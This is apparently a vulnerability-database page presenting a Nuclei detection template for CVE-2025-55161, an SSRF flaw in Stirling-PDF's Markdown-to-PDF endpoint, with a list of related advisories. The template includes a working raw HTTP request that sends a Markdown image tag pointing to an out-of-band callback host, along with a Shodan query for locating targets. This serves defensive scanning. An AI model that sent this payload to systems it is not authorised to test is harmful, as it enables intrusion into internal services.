| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2025-55161 | 12 Aug 202500:38 | – | circl | |
| Stirling-PDF 代码问题漏洞 | 11 Aug 202500:00 | – | cnnvd | |
| CVE-2025-55161 | 11 Aug 202522:28 | – | cve | |
| CVE-2025-55161 Stirling-PDF SSRF vulnerability on /api/v1/convert/markdown/pdf | 11 Aug 202522:28 | – | cvelist | |
| EUVD-2025-24184 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-55161 | 11 Aug 202523:15 | – | nvd | |
| CVE-2025-55161 Stirling-PDF SSRF vulnerability on /api/v1/convert/markdown/pdf | 11 Aug 202522:28 | – | osv | |
| PT-2025-32596 | 11 Aug 202500:00 | – | ptsecurity | |
| CVE-2025-55161 | 13 Aug 202522:28 | – | redhatcve | |
| VulnCheck KEV: CVE-2025-55161 | 7 Oct 202500:00 | – | vulncheck_kev |
id: CVE-2025-55161
info:
name: Stirling-PDF SSRF via Markdown
author: beginee
severity: high
description: |
Stirling-PDF is a locally hosted web application that performs various operations on PDF files. Prior to version 1.1.0, when using the /api/v1/convert/markdown/pdf endpoint to convert Markdown to PDF, the backend calls a third-party tool to process it and includes a sanitizer for security sanitization which can be bypassed and result in SSRF.
impact: |
Unauthenticated attackers can force the server to make requests to arbitrary URLs through malicious Markdown image tags, potentially exposing internal services and credentials.
remediation: This issue has been patched in version 1.1.0.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-55161
- https://github.com/Stirling-Tools/Stirling-PDF
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L
cvss-score: 8.6
cve-id: CVE-2025-55161
cwe-id: CWE-918
epss-score: 0.01865
epss-percentile: 0.76717
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Stirling PDF"
tags: cve,cve2025,ssrf,stirling-pdf,pdf,markdown,oast,oob,vkev,vuln
variables:
filename: "{{to_lower(rand_text_alpha(5))}}"
http:
- raw:
- |
POST /api/v1/convert/markdown/pdf HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvAfAbBmFpYrQfooK
------WebKitFormBoundaryvAfAbBmFpYrQfooK
Content-Disposition: form-data; name="fileInput"; filename="{{filename}}.md"
Content-Type: application/octet-stream
<img src='http://{{interactsh-url}}/' />
------WebKitFormBoundaryvAfAbBmFpYrQfooK--
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'dns')
- contains(content_type, "application/pdf")
- status_code == 200
condition: and
# digest: 4b0a00483046022100be3709fd1dad20bfc25ab8aa4131d0334a75787e5b3f198a37a40add6be568f20221008aa49090e66ef3e8d2ce909041ac00c1c606f445757b0283d77b3af21c8a4fd7:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation